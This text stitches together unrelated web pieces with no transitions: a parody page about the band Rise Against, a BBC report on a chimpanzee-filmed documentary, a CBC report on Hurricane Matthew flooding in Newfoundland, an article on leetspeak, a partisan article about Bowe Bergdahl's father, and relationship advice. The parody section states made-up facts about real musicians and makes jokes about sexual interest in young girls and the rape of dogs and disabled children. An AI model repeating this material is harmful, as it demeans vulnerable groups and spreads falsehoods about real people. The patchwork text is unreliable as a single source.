without comedic tastes, the Rise Against. For thosecomedic tastes, the so-called experts at Wikipedia think they have an article very remotely related to
Rise Against is an American jazz ensemble from Chicago, who like to complain about the American government and write songs about topics they know nothing about, formed in 1999.
They have been referred to as America's first "Musical Terrorists". They also have a tendency to get extremely horny over young girls. Actually, we just said that to add some variety to this article. Anyway, Their current lineup consists of Tim McILLrath (vocals, on-stage air gropes), Joe Penislips (ass guitar), Brandon Barnes (saxophone), and Hairy Zach (weed), all of whom are straight (excluding Penislips), Anti-PETA supporters (excluding Barnes), and strict Rastafarians (especially McILLrath). The band is currently signed to Gayffen, a record label owned by Universal Music Poop. As of 2009, Rise Against has released five studio albums, three EPs, one DVD, and thirteen STDs.
Rise Against spent its first five years signed to the independent record label Morbidly Obese Wreck Chords, on which it released two studio albums. The band gained what they believed was mainstream popularity with its first two releases on Gayffen, Siren Thong Which Is Actually an Album Not a Song (2004) and The Sufferer & the Rapist (2006), which produced several singles which were possibly the most boring singles ever, all which sounded the same, including "Three Wives Away (From a Fox News Headline)", "Hair of the Pubic Tree", and "The Young Girls Left Undone". Their most recent studio album, Appeal to Hookers, was released in North America on December 25, 2008, so Rise Against could piss off the Christians, in an attempt to please the other religions and make more money, as to buy and take over the world. The idea of getting more money is blatantly obvious in their song 'Entertainment' . This album included three tracks that were actually decent, which were "Giving Birth (Through Labor)", "Audience of Young Girls", and "The Young Girl Jokes are Getting Old".
Contents show]
History Edit
Early years Edit
Rise Against, originally called The Jeffersons, was originally made up of Tim McILLrath on Guitar, Joe Penislips on Bass, John Travolta as a Backup Dancer, and Kanye West on Vocals, whom was kicked out of the band for his constant rants about being the Greatest Singer in the World and his spontaneous bedwetting. The Jeffersons then changed their name to Rise Against but were sued by Tom Morello for obvious infringement on the name of his band at the time, Rage Against the Machine. Rise Against was required to pay 666,000,000 dollars and give away all their personal belongings to keep the name.
After the Early Years but Before the Later Years Edit
In 2001, McILLrath and Penislips killed Travolta and brought in a new member (Hairy Zach), who was a raging alcoholic and drug addict. This led to some interesting stage behavior, including Zach removing all of his clothes on stage. Luckily, Zach's actions were a hit and the first stripper was created. As the trend of stripping spread across the country, the band profited and hired a male prostitute named Brandon Barnes to play saxophone, as to complete their jazz ensemble.
That Album We All Forgot About Edit
In 2001, Rise Against recorded their first album. No one knows what this album was called because no one has ever heard of it. It contained nine hundred one tracks. The average track was twenty one seconds long. In total, the album was twenty seconds long. However, in addition to the 901 tracks, there are two bonus tracks, Join Me I'm Lonely and Gesthemesteseminemimane. With the addition of these tracks, the album consisted of 18 tracks and is about 40 minutes long.
Miles Per Hour Edit
Rise Against released their second studio album, Miles Per Hour in 2003. The album originally had three singles: Heaven Knows, Like the Angel and a title track, Miles Per Hour. However, the band's record label, Morbidly Obese Wreck Chords, felt that the title track was too inappropriate, mainly because 3 minutes of the song was the sound Joe's penis "revolving", over and over. The song was not included in the final release, but it, along with the original music video, can still be found on Meatspin.com.
Siren Thong Which is Actually an Album Not a Song Edit
Siren Song was Rise Against's third album. The album is simply George Bush's State of the Union address in its entirety with a saxophone playing in the background.
The Sufferer and the Rapist Edit
In 2006, Rise Against released their first horror film, The Sufferer and the Rapist. It did not play in any public movie theaters, but it did catch the attention of Saw's director James Wan. Wan plans to implement some of Rise Against's ideas into the upcoming Saw 43, which will hit theaters next month.
Appeal to Hookers Edit
An album lots of their fans agree to be ass kicking. Unfortunately, their fans consist mainly of 6th and 7th graders who play too much Guitar Hero. Their single, 'Savior', had a music video which shows a polar bear being participating in the well versed sport of to Mosh. Apparently, the video was about how the elephant was beating up the polar bear and how this was a symbol. They said
"This is to show how the republicans symbol, the elephant, doesn't like the idea of global warming. And the polar bear is really hurt by it."
Well, more or less, they still said it. Also in a news article in africa, where McILLrath was promoting the Rastafarian Movement, he said
"I think our next album will be the worst thing to come from us yet."
A quote from the song "The Dirt Whispered" is "She got down on hands and knees, one ear against the ground, Holding her breath to hear something, but the dirt made not a sound tonight." Which later brought on the album The Sufferer and the Rapist.
Bell-end game Edit
They were right.
The 2011 album was a hit with the Guitar Hero crowd, but the hardcore jazz fans were critical of the band's departure from their previous sound. Most of the tracks were written by browsing the custom songs people had made on Guitar Hero World Tour, and adding newspaper headlines.
Later years(After the Early Years but Before the Later Years) Edit
Rise Against went on tour and played for their fans. They kicked much ass... They also raped much ass... Mainly dogs... and if you count the retarded kids that don't completely know whats going on... well them too.
Long Forgotten Songs Edit
In 2013 Rise Against rereleased many songs which had been on other albums including "Historia Calamitatum". Not being able to understand any of them, reviewers wrote their critiques about birds that were on the album's cover.
Name Change Edit
Rise Against later tested the waters of cannibalism. They are crazy fuckers, so they liked it. They then went on to change their name to "The Donner Party"
In 1945, they released their first album as The Donner Party, "I Really Like To Eat People, Including Women and Children". The album sold 7 copies world wide to the pussies that were too scared to download it illegally. Their first single off of the album, "Who Ate Grandma?", went eleventy-kajillion platinum and made history by beating Jackson Michaels' single, "Duller", in total album downloads. Their second single, "How'd the Fucking Mormons Do This!?!", suffered a harsh fate. It went negative thirty-eight platinum and is regarded as the worst song to ever be heard, created, or played.
In 2012, they plan on releasing a brand-new album, entitled, "I Hope the World Ends Right Now... So I Can Stop Being Expected to Make Shitty, Half-Assed, Sorry Excuses for Songs". It is supposedly due out December 22nd, so if we're lucky, the world will end right before then. Tim McILLrath has said many a time that this album is a backup plan in case the world doesn't end. They will broadcast it over every radio station in the world, thus making everyone's heads explode. This album will destroy everyone and everything in the world, with two exceptions: The grave stone of George "Babe" Herman Ruth and a single vinyl copy of A Flock Of Seagulls' "I Ran (So Far Away)", wrapped in a used condom previously owned by Motley Crue drummer Tommy Lee, stashed under the seal of the Oval Office at the White House.
Influences Edit
Musical Influences Edit
Rise Against has many influences from the world. They come from unlikely places, such as politics to classical music.
Movie made by chimpanzees to be broadcast on television
By Matt Walker
Editor, Earth News
Please turn on JavaScript. Media requires JavaScript to play. Advertisement The world's first film shot entirely by chimpanzees is to be broadcast by the BBC as part of a natural history documentary. The apes created the movie using a specially designed chimp-proof camera given to them by primatologists. The film-making exercise is part of a scientific study into how chimpanzees perceive the world and each other. It will be screened within the Natural World programme "Chimpcam" shown on BBC Two at 2000GMT on Wednesday 27 January. Making the movie was the brainchild of primatologist Ms Betsy Herrelko, who is studying for a PhD in primate behaviour at the University of Stirling, UK. Point and shoot with Chimpcam Over 18 months, she introduced video technology to a group of 11 chimpanzees living in a newly built enclosure at Edinburgh Zoo, UK. The enclosure, which contains three large interlinked outdoor arenas, as well as a series of smaller rooms in which the apes can be studied by researchers, is the largest of its kind in the world. Despite the fact that the chimps had never taken part in a research project before, they soon displayed an interest in film-making. Ms Herrelko set the chimps two challenges. The first was to teach the chimps how to use a touchscreen to select different videos. By doing so, Ms Herrelko could investigate which types of images chimps prefer to watch. The second challenge was to give the apes a "Chimpcam", a recording camera housed in a chimp-proof box. CHIMP TECHNOLOGY
Chimps both in captivity and the wild will spontaneously use tools Some use wooden hammers to break open nuts, others use rocks, while many use varying styles of stick to fish for termites and honey Watch videos of chimps using tools here On top of the box was a video screen that showed live images of whatever the camera was pointing at. Initially, the chimps were more interested in each other than the video technology, as two male chimps within the study group vied to become the alpha male, disrupting the experiment. But over time, some of the chimps learned how to select different videos to watch. For example, the chimps could use a touchscreen to decide whether to watch footage of their outside enclosure, or the food preparation room, where zoo staff prepare the chimps' meals. The results still have to be analysed in detail, but it seems the chimps did not prefer to watch any of these images over the others. Ms Herrelko is not sure why, but it could be that the images shown were too familiar to the chimps or because they have no way of asking to see something different. Then in the final stage of her work, she investigated what happened when she gave the Chimpcam to the whole group. Watching wild relatives Gradually, the chimps started playing with the Chimpcam, carrying it around the enclosure. The chimps soon became interested in the camera view screen on the Chimpcam box, watching what happened as they moved the Chimpcam around filming new images. Overall, they were more interested in the Chipcam viewfinder than they were the touchscreen in the research room. The apes are unlikely to have actively tried to film any particular subject, or understand that by carrying Chimpcam around, they were making a film. However, the result, as well as providing new information on how chimps like to see the world, may yet go down in television history.
Bookmark with: Delicious
Digg
reddit
Facebook
StumbleUpon What are these? E-mail this to a friend Printable version
The cost of repairing damage done by Hurricane Matthew as it moved across southern and central Newfoundland could total more than $1.5 million, triggering a federal response, says Premier Dwight Ball.
Ball said Tuesday afternoon that the province has enough staff to reconnect communities cut off by road washouts, but he expects to get help from Ottawa.
Late Tuesday, Liberal MP Scott Simms confirmed the federal government is ready to help the province recover.
Our Government in touch with provincial Officials. We are ready to help cope with flooding. Please be safe and I will see you soon. —@Scott_Simms
The premier, who spent the day in St. John's at a series of consultations about the Newfoundland and Labrador economy, said he will tour the damaged areas this week.
Parks Canada says the Trans-Canada Highway within Terra Nova National Park will stay closed Tuesday night — anticipating it will re-open by mid-day tomorrow — as crews repair a washout near the east entrance.
Drivers are being asked to stay outside the park and to stay off the T'Railway system, which many are using as an alternative route.
Eddy K and I took a look at the rail bed and it's getting use today <a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://t.co/0aLSJP3TEC">pic.twitter.com/0aLSJP3TEC</a> —@Jeremy_Eaton
The park washout is one of several reported after intense rainfall and heavy winds wreaked havoc from Benoit's Cove to Burgeo and large areas of Notre Dame Bay. Burgeo Mayor Barbara Barter said the highway there will be closed until at least Friday, as there are three collapsed culverts and two other washed-out sections.
According to police, there have been at least two motor vehicle accidents involving washout on the Buchans Highway.
RCMP Cpl. Duncan Osmond confirmed there have been injuries, and said the situation is unfolding.
He said washouts cut off access to both accidents, and a helicopter is being used to transport the injured to awaiting ground ambulances.
Previous Next
DRL Coachlines said it's cancelling its daily cross-province bus run for the day.
Here's the scene in Terra Nova. A few km into the park about 1km north of Cobblers Brook. Big fix underway <a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://t.co/PMXIde0tAn">pic.twitter.com/PMXIde0tAn</a> —@Jeremy_Eaton
The Department of Transportation and Works says many provincial highways have been closed due to flooding. (CBC)
Minister of Transportation and Works Al Hawkins said the provincial government is deploying the necessary resources to assess the damage.
"We're very concerned about the amount of damage that's been done. We realize that there are communities that are cut off, really, because the highways have been damaged."
This map shows just some of the washouts reported Tuesday following Monday's heavy rainfall. (CBC)
Hawkins said the priority is to get communities connected again.
"When communities are cut off then there can be very serious emergencies when it comes to healthcare or drinking water or whatever the case may be," Hawkins said.
Towns respond to emergency
On the south coast, St. Alban's mayor Jamie Leroux said the rain tapered off Tuesday morning, but the town's emergency plan is still in effect.
Paramedics in Point Leamington are stressed over the possibility of a call. The road washout makes them vulnerable. <a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://twitter.com/hashtag/nltraffic?src=hash">#nltraffic</a> —@ryancookeNL
Medic I spoke with said they'd need to stretcher patient across hole, through rushing water to handoff on the other side. <a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://twitter.com/hashtag/nltraffic?src=hash">#nltraffic</a> —@ryancookeNL
Leroux said local roads are in hard shape with the flooding, resulting in outside access to the community being cut off.
The community of Little Burnt Bay near Lewisporte is in a similar situation.
"It's unreal, we're completely cut off down here," said Mayor Laverne Suppa.
"Up behind us is all bog — it just can't handle any water up there. We're just afraid that the pavement can't handle the water."
Suppa said water was even coming up through the floor of her shower Tuesday.
Route 364, the road leading into Hermitage, which also provides access to Sandyville and Seal Cove, is also impassable.
Mayor Steve Crewe said it's going to be a week to 10 days before his town is reconnected, and he's warning residents to be prepared to go without fresh groceries and other amenities.
"It's quite devastating here," he said.
"Hopefully it'll be fixed before that, but they've got a lot of work to do."
This Twitter photo shows damage to the bridge in St. Alban's Tuesday. (Melissa Burke/Twitter)
There is no cell service in the town and the only gas station has been asked to conserve fuel for emergency vehicles.
Crewe said the road from Grand Falls to Route 364 is also impassable.
"Be vigilant and stay where you're to and we'll try to get through this as quickly as possible, but we're not going to be able to get out of town for quite a while."
In Conne River, the pavement is barely holding up in one section of the community, however residents are able to use a detour road to avoid the area.
Though not in a state of emergency, all non-essential services have been cancelled in Conne River, Miawpukek Mi'kamawey Mawi'omi General Manager Theresa O'Keefe said in a release Tuesday afternoon.
While no injuries have been reported, she said roads have been extensively damage and several houses have flooded.
The pavement is barely holding in Conne River. Resident Kathlena Stride says people in the town are using a detour road. (Submitted by Kathlena Stride)
Lewisporte Mayor Brian Sceviour told CBC News dozens of houses have flooded in his town.
Sceviour said he knew of at least 40 flooded homes when the town declared a state of emergency Monday night.
"I've heard of cases where the house has just about the entire basement filled [with water]," he said of the town that's seen more than 143 mm of rain in 24 hours.
"Last night driving through town you could see manholes being lifted up right out of the road with the pressure of the water," Sceviour said.
Sceviour said Lewisporte's biggest problem is its infrastructure not being built to withstand a lot of rain.
"That's [infrastructure] something that could take years to fix overall," Sceviour said.
Central Newfoundland
The situation in the central Newfoundland town of Bishop's Fall is also tense.
Frank Fancey, who lives on Main Street, is dealing with flooding in his home, which is situated near the falls.
Fancey's septic system backed up around 9:30 p.m. Monday.
"I've been here since 1995 and this is obviously the worst we've ever seen," Francey said.
Frank Fancey owns the home beside the raging brook in Bishop's Falls. <a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://t.co/ov6XO5GGRa">pic.twitter.com/ov6XO5GGRa</a> —@ChrisEnsingCBC
Francey said he managed to save some of his belongings, but lost furniture and appliances to the flood.
"Pretty traumatic right now but we will carry on."
Sections of the main road through the community are impassable because of washouts, some homes have been flooded and evacuated, and utility poles are starting to topple, said Mayor Bob Hobbs.
"It's been a rough night," Hobbs said, adding that power has been disconnected to some areas.
Emmanuel Smith watching his shed dangling over a brook that was once 8 feet wide. <a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://t.co/vlfbYyvgmW">pic.twitter.com/vlfbYyvgmW</a> —@ChrisEnsingCBC
The town declared a state of emergency late Monday night.
Hobbs said two sections of town have been hit hardest, and two small streams as now "raging" through neighbourhoods.
The mayor said those evacuated are being accommodated at the town's Lions Club, and the Red Cross is also assisting.
"It's dangerous. When life is threatened, you have to take action," said Hobbs.
Bishop's Falls is situated along the bank of the Exploits River, and flooding is not uncommon in the town.
Many say water levels in the river are at the highest they've been since the disastrous flood of 1983.
Several communities and towns across Newfoundland are in recovery mode Tuesday morning after the trail of Hurricane Matthew brought intense rainfall amounts and heavy winds. 2:06
West coast
In a Facebook post Tuesday morning, the mayor of Corner Brook said town crews are keeping a close eye on brooks and streams as water running below the Main Street bridge "rose to within one-and-a-half feet" below the structure.
Corner Brook Mayor Charles Pender says crews kept a close eye on rising brooks and streams overnight. (Charles Pender/Facebook)
Charles Pender said all storm sewers, brooks, head walks and other infrastructure "performed well with no damage being reported."
Pender advised all residents with storm damage to contact the town's service line.
He said heavy rain on the west coast ended by 4 a.m., and the town sustained minimal damage. Three properties were flooded, he said, when a private storm system plugged on Petries Street. A town foreman was contacted and the flooding was stopped.
South coast
Burgeo was hit with 160 mm, causing the south coast highway to shut down Monday following a washout. The mayor said it will be closed until at least Friday.
High water levels covered lawns in Harbour Breton, on Newfoundland's south coast, around 1 a.m. (Submitted by Katt Lambert)
Firefighter Guy Hann had a close call on his way home from his cabin Monday afternoon.
"There was water going over the road and when I came down to go across the water … it was deeper than I thought it was and the car I was driving, she just sort of floated," he said.
"And lucky enough I made it over, or she went down and struck the pavement, and I got across."
But closer to Burgeo, Hann said he crossed another road mere minutes before it washed out.
"I said to my wife, 'We were more than lucky to get out, probably another five or 10 minutes behind [and] we would have been gone down the brook.'"
Harbour Breton was also "hit quite hard," according to Mayor Roy Drake.
The town recorded a total of 127 mm of rain, had several washouts and a small landslide. Drake said the town had to move residents out of certain areas due to washouts.
Not just rain, but wind...<br>Strong winds toppled this trailer near Stephenville last night. <br>Courtesy of Dianne Brown<a href="https://twitter.com/hashtag/nlwx?src=hash">#nlwx</a> <a href="https://t.co/1DHKfqlwtG">pic.twitter.com/1DHKfqlwtG</a> —@ryansnoddon
Most forced to leave their homes stayed with relatives overnight, but Drake said some slept in the town's arena.
Harbour Breton's main intersection has one passable lane, Drake said, but the highway leading into the town is closed.
While Harbour Breton has maintained cell and Internet and service, Drake said a major concern is the lack of an ambulance — it's stranded outside the town in Grand Falls-Windsor.
Rainfall totals
Meteorologist Rodney Barney reported the highest total of rain in Grand Falls-Windsor, which reached 180 mm.
Badger got upwards of 154 mm of rain, Millertown received 140 mm, Port aux Basques recorded 93 mm and Deer Lake had 68 mm.
<a href="https://twitter.com/hashtag/NLwx?src=hash">#NLwx</a> Wind Warning expanded to include Burin Peninsula & Connaigre. Gusts to 100 km/h today. <a href="https://t.co/F8iVYGP19J">https://t.co/F8iVYGP19J</a> <a href="https://t.co/KGT5nQqmuU">pic.twitter.com/KGT5nQqmuU</a> —@ryansnoddon
Get continuous storm updates from across the island through our live blog.
Leet (or "1337"), also known as eleet or leetspeak, is a system of modified spellings used primarily on the Internet. It often uses character replacements in ways that play on the similarity of their glyphs via reflection or other resemblance. Additionally, it modifies certain words based on a system of suffixes and alternate meanings. There are many dialects or linguistic varieties in different online communities.
The term "leet" is derived from the word elite, used as an adjective to describe formidable prowess or accomplishment, especially in the fields of online gaming and computer hacking. The leet lexicon includes spellings of the word as 1337 or l33t.
History [ edit ]
Leet originated within bulletin board systems (BBS) in the 1980s,[1][2] where having "elite" status on a BBS allowed a user access to file folders, games, and special chat rooms. The Cult of the Dead Cow hacker collective has been credited with the original coining of the term, in their text-files of that era.[3] One theory is that it was developed to defeat text filters created by BBS or Internet Relay Chat system operators for message boards to discourage the discussion of forbidden topics, like cracking and hacking.[1] Creative misspellings and ASCII-art-derived words were also a way to attempt to indicate one was knowledgeable about the culture of computer users.
Once the reserve of hackers, crackers, and script kiddies, leet has since entered the mainstream.[1] It is now also used to mock newbies, also known colloquially as noobs, or newcomers, on web sites, or in gaming communities.[4] Some consider emoticons and ASCII art, like smiley faces, to be leet, while others maintain that leet consists of only symbolic word encryption. More obscure forms of leet, involving the use of symbol combinations and almost no letters or numbers, continue to be used for its original purpose of encrypted communication. It is also sometimes used as a script language. Variants of leet have been used for censorship purposes for many years; for instance "@$$" (ass) and "$#!+" (shit) are frequently seen to make a word appear censored to the untrained eye but obvious to a person familiar with leet.
Leet symbols, especially the number 1337, are Internet memes that have spilled over into popular culture. Signs that show the numbers "1337" are popular motifs for pictures and shared widely across the Internet.
Orthography [ edit ]
One of the hallmarks of leet is its unique approach to orthography, using substitutions of other characters, letters or otherwise, to represent a letter or letters in a word.[5][6] For more-casual use of leet, the primary strategy is to use homoglyphs, symbols that closely resemble (to varying degrees) the letters for which they stand. The choice of symbol is not fixed—anything the reader can make sense of is valid. However, this practice is not extensively used in regular leet; more often it is seen in situations where the argot (i.e., secret language) characteristics of the system are required, either to exclude newbies or outsiders in general, i.e., anything that the average reader cannot make sense of is valid; a valid reader should himself try to make sense, if deserving of the underlying message. Another use for Leet orthographic substitutions is the creation of paraphrased passwords.[1] Limitations imposed by websites on password length (usually no more than 36) and the characters permitted (usually alphanumeric and underscore)[citation needed] require less extensive forms of Leet when used in this application.
Some examples of leet include B1ff and n00b, a term for the stereotypical newbie; the l33t programming language; and the web-comic Megatokyo, which contains characters who speak leet.
Morphology [ edit ]
Text rendered in leet is often characterized by distinctive, recurring forms.
-xor suffix The meaning of this suffix is parallel with the English -er and -r suffixes (seen in hacker and lesser)[2] in that it derives agent nouns from a verb stem. It is realized in two different forms: -xor and -zor, and , respectively. For example, the first may be seen in the word hax(x)or (H4x0r in leet) and the second in pwnzor . Additionally, this nominalization may also be inflected with all of the suffixes of regular English verbs. The letter 'o' is often replaced with the numeral 0.
-age suffix Derivation of a noun from a verb stem is possible by attaching -age to the base form of any verb. Attested derivations are pwnage, skillage, and speakage. However, leet provides exceptions; the word leetage is acceptable, referring to actively being leet.[7] These nouns are often used with a form of "to be" rather than "to have," e.g., "that was pwnage" rather than "he has pwnage". Either is a more emphatic way of expressing the simpler "he pwns," but the former implies that the person is embodying the trait rather than merely possessing it.
-ness suffix Derivation of a noun from an adjective stem is done by attaching -ness to any adjective. This is entirely the same as the English form, except it is used much more often in Leet. Nouns such as lulzness and leetness are derivations using this suffix.
Words ending in -ed When forming a past participle ending in -ed, the Leet user may replace the -e with an apostrophe, as was common in poetry of previous centuries, (e.g. "pwned" becomes "pwn'd"). Sometimes, the apostrophe is removed as well (e.g. "pwned" becomes "pwnd"). The word ending may also be substituted by -t (e.g. pwned becomes pwnt).[8]
Use of the -& suffix Words ending in -and, -anned, -ant, or a similar sound can sometimes be spelled with an ampersand (&) to express the ending sound (e.g. "This is the s&box," "I'm sorry, you've been b&", "&hill/&farm"). This is most commonly used with the word banned. An alternate form of "B&" is "B7", as the ampersand is typed with the "7" key in the standard US keyboard layout. It is often seen in the phrase "IBB7" (in before banned), which indicates that the poster believes that a previous poster will soon be banned from the site, channel, or board on which they are both posting.
Grammar [ edit ]
Leet can be pronounced as a single syllable, /ˈliːt/, rhyming with eat, by way of aphesis of the initial vowel of "elite". It may also be pronounced as two syllables, /ɛˈliːt/. Like hacker slang, leet enjoys a looser grammar than standard English.[4] The loose grammar, just like loose spelling, encodes some level of emphasis, ironic or otherwise. A reader must rely more on intuitive parsing of leet to determine the meaning of a sentence rather than the actual sentence structure. In particular, speakers of leet are fond of verbing nouns, turning verbs into nouns (and back again) as forms of emphasis, e.g. "Austin rocks" is weaker than "Austin roxxorz" (note spelling), which is weaker than "Au5t1N is t3h r0xx0rz" (note grammar), which is weaker than something like "0MFG D00D /\Ü571N 15 T3H l_l83Я 1337 Я0XX0ЯZ" (OMG, dude, Austin is the über-elite rocks-er!). In essence, all of these mean "Austin rocks," not necessarily the other options. Added words and misspellings add to the speaker's enjoyment. Leet, like hacker slang, employs analogy in construction of new words. For example, if haxored is the past tense of the verb "to hack" (hack → haxor → haxored), then winzored would be easily understood to be the past tense conjugation of "to win," even if the reader had not seen that particular word before.
Leet has its own colloquialisms, many of which originated as jokes based on common typing errors, habits of new computer users, or knowledge of cyberculture and history.[9] Leet is not solely based upon one language or character set. Greek, Russian, and other languages have leet forms, and leet in one language may use characters from another where they are available. As such, while it may be referred to as a "cipher", a "dialect", or a "language", leet does not fit squarely into any of these categories. The term leet itself is often written 31337, or 1337, and many other variations. After the meaning of these became widely familiar, 10100111001 came to be used in its place, because it is the binary form of 1337 decimal, making it more of a puzzle to interpret.[Notes 1] An increasingly common characteristic of leet is the changing of grammatical usage so as to be deliberately incorrect. The widespread popularity of deliberate misspelling is similar to the cult following of the "All your base are belonged to us" phrase. Indeed, the online and computer communities have been international from their inception, so spellings and phrases typical of non-native speakers are quite common.
Vocabulary [ edit ]
Many words originally derived from leet slang have now become part of the modern Internet slang, such as "pwned".[1] The original driving forces of new vocabulary in leet were common misspellings and typing errors such as "teh" (generally considered lolspeak), and intentional misspellings,[10] especially the "z" at the end of words ("skillz").[1] Another prominent example of a surviving leet expression is w00t, an exclamation of joy.[2] w00t is sometimes used as a backronym for "We owned the other team."
New words (or corruptions thereof) may arise from a need to make one's username unique. As any given Internet service reaches more people, the number of names available to a given user is drastically reduced. While many users may wish to have the username "CatLover," for example, in many cases it is only possible for one user to have the moniker. As such, degradations of the name may evolve, such as "C@7L0vr." As the leet cipher is highly dynamic, there is a wider possibility for multiple users to share the "same" name, through combinations of spelling and transliterations.
Additionally, leet—the word itself—can be found in the screen-names and gamertags of many Internet and video games. Use of the term in such a manner announces a high level of skill, though such an announcement may be seen as baseless hubris.[11]
Terminology and common misspellings [ edit ]
Warez (nominally ) is a plural shortening of "software", typically referring to cracked and redistributed software.[11] Phreaking refers to the hacking of telephone systems and other non-Internet equipment.[1] Teh originated as a typographical error of "the", and is sometimes spelled t3h.[1][12] j00 takes the place of "you",[2] originating from the affricate sound that occurs in place of the palatal approximant, /j/, when you follow a word ending in an alveolar plosive consonant, such as /t/ or /d/. Also, from German, is über, which means "over" or "above"; it usually appears as a prefix attached to adjectives, and is frequently written without the umlaut over the u.[13]
Haxor and suxxor (suxorz) [ edit ]
Haxor, and derivations thereof, is leet for "hacker",[14] and it is one of the most commonplace examples of the use of the -xor suffix. Suxxor (pronounced suck-zor) is a derogatory term which originated in warez culture and is currently used in multi-user environments such as multiplayer video games and instant messaging; it, like haxor, is one of the early leet words to use the -xor suffix. Suxxor is a modified version of "sucks" (the phrase "to suck"), and the meaning is the same as the English slang. Its negative definition essentially makes it the opposite of roxxor, and both can be used as a verb or a noun. The letters ck are often replaced with the Greek Χ (chi) in other words as well.
n00b [ edit ]
Within leet, the term n00b, and derivations thereof, is used extensively. The word means and derives from newbie (as in new and inexperienced or uninformed),[10][13][15] and is used as a means of segregating them as less than the "elite," or even "normal," members of a group.
Owned and pwned [ edit ]
Owned and pwn3d (generally pronounced "owned" and "poned", respectively) both refer to the domination of a player in a video game or argument (rather than just a win), or the successful hacking of a website or computer.[1][13][16]
As is a common characteristic of leet, the terms have also been adapted into noun and adjective forms,[13] ownage and pwnage, which can refer to the situation of pwning or to the superiority of its subject (e.g., "He is a very good player. He is pwnage.").
Pr0n [ edit ]
Pr0n is slang for pornography.[1] This is a deliberately inaccurate spelling/pronunciation for porn,[15] where a zero is often used to replace the letter O. It is sometimes used in legitimate communications (such as email discussion groups, Usenet, chat rooms, and Internet web pages) to circumvent language and content filters, which may reject messages as offensive or spam. The word also helps prevent search engines from associating commercial sites with pornography, which might result in unwelcome traffic.[citation needed] Pr0n is also sometimes spelled backwards (n0rp) to further obscure the meaning to potentially uninformed readers.[Notes 2] It can also refer to ASCII art depicting pornographic images, or to photos of the internals of consumer and industrial hardware. Prawn, a spoof of the misspelling, has started to come into use, as well; in Grand Theft Auto: Vice City, a pornographer films his movies on "Prawn Island". Conversely, in the RPG Kingdom of Loathing, prawn, referring to a kind of crustacean, is spelled pr0n, leading to the creation of food items such as "pr0n chow mein".
See also [ edit ]
Notes [ edit ]
^ This appears as an in-joke for technical illustrations such as these: (a) (b) ^ This can be observed by searching for "n0rp" on a search engine.
a b c d e f g h i j Mitchell. a b c d An Explanation of l33t Speak. ^ E-Commerce Times Mello, John P.(2015) " [1] Google Expands Bug Bounty Program" February 2, 2015. a b Rome. ^ Sterling, 70. ^ Blashki & Nichol, 80. ^ Blashki & Nichol, 79. ^ LeBlanc, 33. ^ Blashki & Nichol, 81. a b Blashki & Nichol, 83. a b Computer Hope Dictionary. ^ LeBlanc, 34-35. a b c d Van de Velde & Meuleman. ^ LeBlanc, 30; 32. a b The Acronym Finder. ^ LeBlanc, 32-33.
A Twitter posting by the father of the serviceman released from Taliban captivity Saturday in exchange for five prisoners from Guantanamo Bay is raising deep questions about what exactly the Obama administration did to get Army Sgt. Bowe Bergdahl out of Afghanistan.
Here's the tweet, which Robert Bergdahl posted May 28 – before his son's release – and deleted Saturday, according to Twitchy.com.
Whatever else it might be, “God will repay for the death of every Afghan child, ameen!” doesn't sound like a rousing call to patriotism.
ABalkhi is the Twitter handle of Abdulqahar Balkhi, a Taliban spokesman.
It's important to remember the elder Bergdahl posted the message while his son was still in captivity and might have been willing to say anything while talking to the sergeant's captors. It's also unclear whether the tweet was intended to be public.
But the contents of the posting are making a lot of people suspicious.
The circumstances of Bergdahl's capture are already odd — no one knows why he left that Army base five years ago and a USA story published Saturday shows Bergdahl is thought by many in the military to have either deserted or gone AWOL.
Also, the release of Guantanamo Bay terrorists in exchange for him violates a longstanding U.S. policy of not negotiating — at least publicly — with terrorist organizations. It also violated U.S. law that requires Congress to receive 30 days' notice before Gitmo prisoners are released, according to top Republicans on the House and Senate armed services committees.
And, let's face it, the Obama administration is widely distrusted particularly when it comes to its handling of terrorism — the shadows of Benghazi are long. Twitter postings reacting to the elder Bergdahl's deleted post reflected that.
Here's a sample, via Twitchy.
(Note: Some strong language at the end.)
This is why Obama might have another scandal on his hands.. #Fatigue pic.twitter.com/UxgoGM15Er — S.M (@redsteeze) June 1, 2014
Wow. This is the father who appeared alongside Obama today. RT @bobbergdahl: I am still working to free all Guantanamo prisoners. — Christian Ziegler (@ChrisMZiegler) June 1, 2014
@irritatedwoman Why is Bowe Berghdahl's father trying 2 free Gitmo prisoners? This POW story has been odd since day 1 pic.twitter.com/x6R7JinoeX — Mary A (@JoanOfArc1909) June 1, 2014
@RichardGrenell I am sick to my stomach! God save us from our leaders. — Deborah Matthews (@DeborahMatthew1) May 31, 2014
And here's one that pretty well sums up how Americans might feel about the whole situation.
So, it seems Bergdahl's father is sympathetic toward the Taliban at Gitmo. That's fucking fantastic. — TFC3Tweets (@TFC3Tweets) June 1, 2014
That's tough to beat.
Arguments happen in every healthy relationship — it sounds contradictory, but it's true. It's okay to argue with your partner; not everyone will agree on everything all of the time. But arguments can have a negative impact if they aren't handled properly.
Now, we want to be clear: we are by no means saying that physical altercations, abusive outbursts or screaming tirades are okay or normal. We're talking about disagreements that occur within healthy, respectful relationships.
The trick to preventing an argument from destroying your relationship is learning how to “fight” fair. You and your partner can use the tips below to keep your relationship healthy and respectful, even during disagreements.
Take a breath. It can be difficult to think clearly when you're angry, so taking a moment to collect your thoughts before engaging in a dialogue with your partner can be helpful. Anger can be poisonous, and if you're not careful you could potentially say something that might damage your relationship.
Use “I feel” language. When arguing with your partner, try to think carefully about the words you're using. You'll have a more productive argument if you focus less on the actions of your partner and describe how those actions make you feel. For example, instead of saying “You always choose the movie,” say, “I feel like I don't get the opportunity to pick the movie.”
Take the situation as it is. Even though you're angry and it can be hard to be objective, try to see the situation for what it is. Try not to escalate the argument just because your partner does. Ask yourself: is this situation worth arguing about? Try to understand the purpose behind an action. If something happened accidentally, you should not treat it as if it was done intentionally.
Avoid making excuses. If you have done something wrong, the best possible option is to admit it. Denying something only makes it more hurtful, and your partner is likely to forgive you much more quickly if you are honest and forthcoming.
